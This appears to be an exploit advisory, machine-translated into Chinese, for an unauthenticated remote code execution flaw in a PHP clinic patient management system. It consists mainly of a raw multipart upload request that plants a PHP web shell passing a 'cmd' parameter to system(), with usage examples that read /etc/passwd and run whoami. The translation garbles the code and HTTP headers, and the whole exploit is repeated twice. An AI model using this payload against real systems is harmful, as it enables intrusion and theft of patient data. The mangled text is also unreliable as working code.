#利用标题:诊所的患者管理系统1.0-未经身份验证的RCE
#日期: 07.10.2023
#利用作者
ğulcanhamiGül
#供应商homepage3360 https://www.sourcecodester.com/php-clinics-patient-management-management-System-Source-Code-code
#软件链接: https://www.sourcecodester.com/down...le=clinic'S+Patient+Patient+Management+Symage
#版本: 1.0
#测试在: Windows 10
##未经验证的用户可以访问/pms/users.php地址,他们可以上传恶意PHP文件,而不是配置文件图片图像,而无需任何身份验证。
post/pms/users.php http/1.1
HOST: 192.168.1.36
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=---------------------------------- 42175569701784551042596452367
内容长度: 1054
Origin: http://192.168.1.36
连接:关闭
Referer: http://192.168.1.36/pms/users.php
升级- 不肯定- requests: 1
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='display_name'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='user_name'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='密码'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data; name='profile_picture';文件名='simple-backdoor.php'
content-type:应用程序/x-php
!
php
if(isset($ _请求['cmd'])){
回声'pre';
$ cmd=($ _request ['cmd']);
系统($ cmd);
回声'/pre';
死;
}
?
USAGE: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
! - http://michaeldaw.org 2006-
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='save_user'
------------------------------------------------ 421755697017784551042596452367-
##在攻击者发送的文件上传请求后,应用程序将随机数添加到要上传的文件的开头。恶意文件可以在path /pms/users.php下看到,而无需任何身份验证。
##带有请求3http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami攻击者可以在应用程序服务器上执行任意命令。
#日期: 07.10.2023
#利用作者
ğulcanhamiGül#供应商homepage3360 https://www.sourcecodester.com/php-clinics-patient-management-management-System-Source-Code-code
#软件链接: https://www.sourcecodester.com/down...le=clinic'S+Patient+Patient+Management+Symage
#版本: 1.0
#测试在: Windows 10
##未经验证的用户可以访问/pms/users.php地址,他们可以上传恶意PHP文件,而不是配置文件图片图像,而无需任何身份验证。
post/pms/users.php http/1.1
HOST: 192.168.1.36
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=---------------------------------- 42175569701784551042596452367
内容长度: 1054
Origin: http://192.168.1.36
连接:关闭
Referer: http://192.168.1.36/pms/users.php
升级- 不肯定- requests: 1
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='display_name'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='user_name'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='密码'
SEFA7
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data; name='profile_picture';文件名='simple-backdoor.php'
content-type:应用程序/x-php
!
php
if(isset($ _请求['cmd'])){
回声'pre';
$ cmd=($ _request ['cmd']);
系统($ cmd);
回声'/pre';
死;
}
?
USAGE: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
! - http://michaeldaw.org 2006-
--------------------------------------------- 421755697017784551042596452367
content-disposition: form-data;名称='save_user'
------------------------------------------------ 421755697017784551042596452367-
##在攻击者发送的文件上传请求后,应用程序将随机数添加到要上传的文件的开头。恶意文件可以在path /pms/users.php下看到,而无需任何身份验证。
##带有请求3http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami攻击者可以在应用程序服务器上执行任意命令。